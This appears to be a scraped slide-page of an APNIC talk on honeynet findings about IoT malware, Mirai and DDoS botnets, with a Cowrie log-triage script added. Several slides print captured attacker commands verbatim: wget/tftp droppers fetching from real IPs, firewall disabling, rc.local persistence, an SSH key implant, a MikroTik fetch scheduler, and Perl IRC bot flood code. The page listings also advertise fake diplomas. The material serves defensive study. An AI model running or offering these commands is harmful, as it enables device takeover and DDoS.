• IP addresses of the hosts serving the binary/malware + other artefacts
• IP addresses/domains of command and control
• Binaries, scripts, malware samples, source code (+ hashes)
• SSH keys, webshells, group names, IRC #channels
• Miner-related information (pool, wallet)
• Correlate with other observations, reports, etc.
Lessons Learned
Lessons Learned
• Context: how can we “improve” security?
• Bad practices
o Telnet enabled by default on devices
o Weak or default credentials not removed
o Services not developed securely
o Services not deployed securely (e.g. management interfaces should not be exposed on the Internet)
o No action upon notification (“not our device, it is the customer's”)
• Miscreants will exploit the weaknesses and monetize them
Source IP from TO
2020-10-16T06:53:37.404513Z - cowrie : Traffic from IP address: x.z.y.56 src_port: 33903 dest_port: 23 ASN Info: XYZ , 38201 , x.z.y.0/21
(Screenshot: AbuseIPDB lookup of the source IP)
Back to the drawing board?
• Keeping the Internet safe and secure for _everyone_
• Education
– Users, operators, developers
• Governance
– Incident Response
– Roles and responsibilities
– Accountabilities
Thank You!
LinkedIn: Adli Wahid
Email: adli@apnic.net
Twitter: @adliwahid
PGP: 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696
https://www.unsplash.com/adliwahid

Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
APNIC
 
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
APNIC
 
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC
 
NANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff HustonNANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff Huston
APNIC
 
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff HustonDNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
APNIC
 
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, ThailandAPAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APNIC
 

More from APNIC (20)

APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
 
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...
 
APNIC Updates presented by Paul Wilson at CaribNOG 27
APNIC Updates presented by Paul Wilson at  CaribNOG 27APNIC Updates presented by Paul Wilson at  CaribNOG 27
APNIC Updates presented by Paul Wilson at CaribNOG 27
 
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
 
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
 
APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
 
IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119
 
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
 
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
 
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
 
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
 
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
 
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
 
NANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff HustonNANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff Huston
 
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff HustonDNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
 
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, ThailandAPAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
 

Recently uploaded

Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Florence Consulting
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
keoku
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
Trish Parr
 
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
cuobya
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
eutxy
 
Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027
harveenkaur52
 
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
3ipehhoa
 
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
zoowe
 
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
CIOWomenMagazine
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
Rogerio Filho
 
How to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptxHow to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptx
Gal Baras
 
1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
JeyaPerumal1
 
Understanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdfUnderstanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdf
SEO Article Boost
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
nhiyenphan2005
 
7 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 20247 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 2024
Danica Gill
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
cuobya
 
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
3ipehhoa
 
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
JeyaPerumal1
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Brad Spiegel Macon GA
 
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
vmemo1
 

Recently uploaded (20)

Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
 
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
 
Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027
 
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
 
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
 
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
 
How to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptxHow to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptx
 
1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
 
Understanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdfUnderstanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdf
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
 
7 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 20247 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 2024
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
 
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
 
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
 
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
 

IBCAST 2021: Observations and lessons learned from the APNIC Community Honeynet Project

8. Honeynet dashboard (figure) * Traffic from the last 30 days
11. Country View – Pakistan (Last 90 days) (dashboard figure)
13. Linux/Unix Malware
• Routers, IoT devices and servers run Linux/Unix-based operating systems
• Not new, but pervasive
– Targets are exposed on the Internet (HTTP, Telnet, SSH)
– Unpatched / unmonitored (e.g. no anti-virus, firmware upgrades not applied)
– Default / weak credentials
• Popular example: Mirai (DDoS agent)
– Source code was shared publicly
– Many variants: josho, owari, masuta, sora, etc.
– Gafgyt (another popular family)
• Simple techniques for infecting, spreading and persisting
• Interesting scenarios
– Working from home
– Servers / hosting / cloud
14. Different Perspectives of a DDoS (diagram)
• My network / infrastructure / host as the source of the attack traffic
• Target / victim perspective
• Attacker perspective
15. Service & Attacker Infrastructure
• Setting up the infrastructure
• Misconfigured services
– Servers: NTP, DNS, SSDP, etc.
– Amplification attack: the request is sent with a spoofed source address, so the (much larger) reply lands on the victim
– https://stats.cybergreen.net/
– https://www.shadowserver.org/what-we-do/network-reporting/get-reports
• Active bot "recruitment"
– Internet-exposed services
– Vulnerable devices
– Weak credentials
16. "Recruitment Process" (diagram)
• The attacker gains access to an exposed device, either by brute force (e.g. username admin, password 12345) or by remote code execution via the web interface
• Download binary and execute, e.g. wget http://37.x.2x.190:80/13747243572475/hx86_64
• The infected device scans for and gains access to further devices
• It connects to command and control (C&C)
17. Telnet/SSH Honeypot (Cowrie)
• Emulates SSH / Telnet
– Allows the attacker to log in
• Emulates a Linux/Unix environment
– Captures the commands issued by the attacker after login
– Including downloads
• "Look and feel" of Linux/Unix servers and IoT devices
• Attracts a certain class of attacks
– Scan for SSH/Telnet
– Brute-force username/password
– Login and execute payload(s)
• DDoS agents and cryptominers
– Based on post-login activities and binaries collected
(Figure: Mirai sample, 2016)
18. Successful Logins – New Honeypot
Two cowrie.login.success events on the same sensor, seconds apart, from different source IPs using the same root password:
{
  "eventid": "cowrie.login.success",
  "username": "root",
  "timestamp": "2018-10-07T19:31:50.568233Z",
  "message": "login attempt [root/taZz@23495859] succeeded",
  "src_ip": "123.b.c.12",
  "session": "fd7977b0b54a",
  "password": "taZz@23495859",
  "sensor": "mn-001"
}
{
  "eventid": "cowrie.login.success",
  "username": "root",
  "timestamp": "2018-10-07T19:31:59.378766Z",
  "message": "login attempt [root/taZz@23495859] succeeded",
  "src_ip": "80.x.y.62",
  "session": "fdcd399b1282",
  "password": "taZz@23495859",
  "sensor": "mn-001"
}
Check out: https://www.bankinfosecurity.com/botnets-keep-brute-forcing-internet-things-devices-a-
19. Execute Payload
Captured dropper script: it changes into the first directory it can enter, fetches the Mirai MIPS binary by wget, busybox wget or tftp, runs it and removes the file.
#!/bin/sh
cd /tmp || cd /honme/$USER || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; busybox wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; tftp -r mirai.mips -g 185.10.68.175; busybox tftp -r mirai.mips -g 185.10.68.175; chmod 777 mirai.mips; ./bins/mirai.mips; rm -rf mirai.mips
20. More captured post-login command sequences
(a) Downloader with persistence: stops the host firewall, fetches and runs "dx", and appends itself to /etc/rc.local so it survives a reboot
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://116.211.145.29:8887/dx;chmod 777 dx;./dx;echo "cd /tmp/">>/etc/rc.local;echo "./dx&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
(b) SSH key implant: replaces ~/.ssh with the attacker's public key (key comment "mdrfckr")
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
(c) Account takeover: feeds the current and the new password to passwd (the newline escapes were lost on the slide and are restored here)
echo -e "password\n1o53kTj3yZq9\n1o53kTj3yZq9"|passwd|bash
(d) MikroTik RouterOS persistence: a scheduler entry that fetches and imports a script every 10 minutes with a full policy set
system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://spacewb.tech/poll/bd54f492-5909-49dd-bf2e-efbe029383ce mode=http dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
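The login events on slide 18 and the command sequences on slides 19 and 20 are exactly what a Cowrie sensor writes to its JSON log, so they can be triaged automatically. The script below is an added example written for this page; it is not code from the APNIC Community Honeynet Project. It assumes Cowrie's JSON event names and fields (cowrie.login.success, cowrie.command.input with "input", cowrie.session.file_download with "url" and "shasum"); the log lines are constructed after the slide samples, and the IPs, the hash and the SSH key fragment in them are placeholders. It reconstructs each session (credential, tactics seen in the commands, URLs and sample hashes), flags passwords reused from several source IPs, and emits a flat indicator list of the kind the project shares through MISP.

```python
"""Triage Cowrie JSON events into credentials, attacker tactics and indicators.

Added example for this page; it is not code from the APNIC Community Honeynet
Project. It assumes Cowrie's JSON event names and fields (cowrie.login.success,
cowrie.command.input with "input", cowrie.session.file_download with "url" and
"shasum"). The log lines below are constructed, modelled on the slide samples;
IPs, the hash and the SSH key fragment are placeholders.
"""
import json
import re
from collections import defaultdict

SAMPLE_LOG = r'''
{"eventid":"cowrie.login.success","username":"root","password":"taZz@23495859","src_ip":"123.0.0.12","session":"fd7977b0b54a","sensor":"mn-001","timestamp":"2018-10-07T19:31:50.568233Z"}
{"eventid":"cowrie.command.input","session":"fd7977b0b54a","input":"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; chmod 777 mirai.mips; ./mirai.mips; rm -rf mirai.mips","timestamp":"2018-10-07T19:31:52.000000Z"}
{"eventid":"cowrie.session.file_download","session":"fd7977b0b54a","url":"http://185.10.68.175/bins/mirai.mips","shasum":"0000000000000000000000000000000000000000000000000000000000000000","timestamp":"2018-10-07T19:31:53.000000Z"}
{"eventid":"cowrie.login.success","username":"root","password":"taZz@23495859","src_ip":"80.0.0.62","session":"fdcd399b1282","sensor":"mn-001","timestamp":"2018-10-07T19:31:59.378766Z"}
{"eventid":"cowrie.command.input","session":"fdcd399b1282","input":"/etc/init.d/iptables stop; cd /tmp; wget -c http://116.211.145.29:8887/dx; chmod 777 dx; ./dx; echo \"./dx&\">>/etc/rc.local; cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3Nza mdrfckr\">>.ssh/authorized_keys","timestamp":"2018-10-07T19:32:01.000000Z"}
'''

# Post-login behaviours seen in the captured payloads on the slides.
TACTICS = {
    "download": re.compile(r"\b(?:wget|curl|tftp|ftpget)\b"),
    "firewall_disable": re.compile(r"iptables stop|SuSEfirewall2 stop|ufw disable|setenforce 0"),
    "persist_rc_local": re.compile(r">>\s*/etc/rc\.local"),
    "ssh_key_implant": re.compile(r"authorized_keys"),
    "cred_change": re.compile(r"\bpasswd\b|\bchpasswd\b"),
    "cleanup": re.compile(r"\brm -rf\b"),
}
URL_RE = re.compile(r"(?:https?|tftp)://[^\s;\"'|&)]+")


def parse_events(text):
    """One JSON object per line, as Cowrie's JSON output plugin writes them."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def classify(command):
    """Names of the tactics whose pattern appears in one command line."""
    return sorted(name for name, rx in TACTICS.items() if rx.search(command))


def triage(text):
    """Group events by Cowrie session: who logged in, what they ran, what they fetched."""
    sessions = defaultdict(lambda: {"commands": [], "tactics": set(), "urls": set(), "hashes": set()})
    for ev in parse_events(text):
        s = sessions[ev["session"]]
        kind = ev["eventid"]
        if kind == "cowrie.login.success":
            s["sensor"], s["src_ip"] = ev["sensor"], ev["src_ip"]
            s["credential"] = (ev["username"], ev["password"])
        elif kind == "cowrie.command.input":
            cmd = ev["input"]
            s["commands"].append(cmd)
            s["tactics"].update(classify(cmd))
            s["urls"].update(URL_RE.findall(cmd))
        elif kind == "cowrie.session.file_download":
            # Cowrie hashes what it captured; the hash ties the URL to a sample.
            s["urls"].add(ev["url"])
            s["hashes"].add(ev["shasum"])
    return dict(sessions)


def shared_credentials(sessions, min_sources=2):
    """Credentials used from several source IPs: the mark of a shared brute-force list."""
    by_cred = defaultdict(set)
    for s in sessions.values():
        if "credential" in s:
            by_cred[s["credential"]].add(s["src_ip"])
    return {cred: sorted(ips) for cred, ips in by_cred.items() if len(ips) >= min_sources}


def indicators(sessions):
    """Flat indicator lists, ready to become MISP attributes or a blocklist."""
    out = {"src_ip": set(), "url": set(), "sha256": set()}
    for s in sessions.values():
        if "src_ip" in s:
            out["src_ip"].add(s["src_ip"])
        out["url"] |= s["urls"]
        out["sha256"] |= s["hashes"]
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    sess = triage(SAMPLE_LOG)
    for sid, s in sess.items():
        print(sid, s.get("src_ip"), s.get("credential"), sorted(s["tactics"]))
    print("shared credentials:", shared_credentials(sess))
    print("indicators:", indicators(sess))
```

The tactic patterns are deliberately coarse: they are meant to rank sessions for a human, not to replace looking at the commands. Note that "rm -rf" alone fires for both the attacker's cleanup and for a legitimate user, which is why the report keeps the raw command list alongside the tactic names.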
21. Perl IRC bot (configuration snippet from the captured script)
my $process = $rps[rand scalar @rps];
my @rversion = ("Phl4nk");
my $vers = $rversion[rand scalar @rversion];
my @rircname = ("zombie");
my $ircname = $rircname[rand scalar @rircname];
chop (my $realname = $rircname[rand scalar @rircname]);
my $nick = $rircname[rand scalar @rircname];
my $server = '125.x.y.z53';
my $port = '1947';
my $linas_max = '8';
my $sleep = '5';
my $homedir = "/tmp";
my $version = 'v.02';
my @admins = ("Nite","NiteMax","Nite123");
#my @hostauth = ("Nite");
my @channels = ("#VPS");
Command that fetched and ran it: uname -a & curl -O http://[xx].do.am/adm.txt ; perl adm.txt ; rm -rf adm.txt
22. Perl IRC bot: flood and utility command help (source excerpt; the mIRC colour-control characters before 4,1 / 9,1 / 12 were lost in extraction, and some lines are cut off on the slide)
if ($funcarg =~ /^flood/) {
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Flood Help: ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp1 <ip> <port> <time> ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp2 <ip> <packet size> <time> ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp3 <ip> <port> <time> ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1tcp <ip> <port> <packet size> <time> ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1http <site> <time> ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1ctcpflood <nick> ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1msgflood <nick> ");
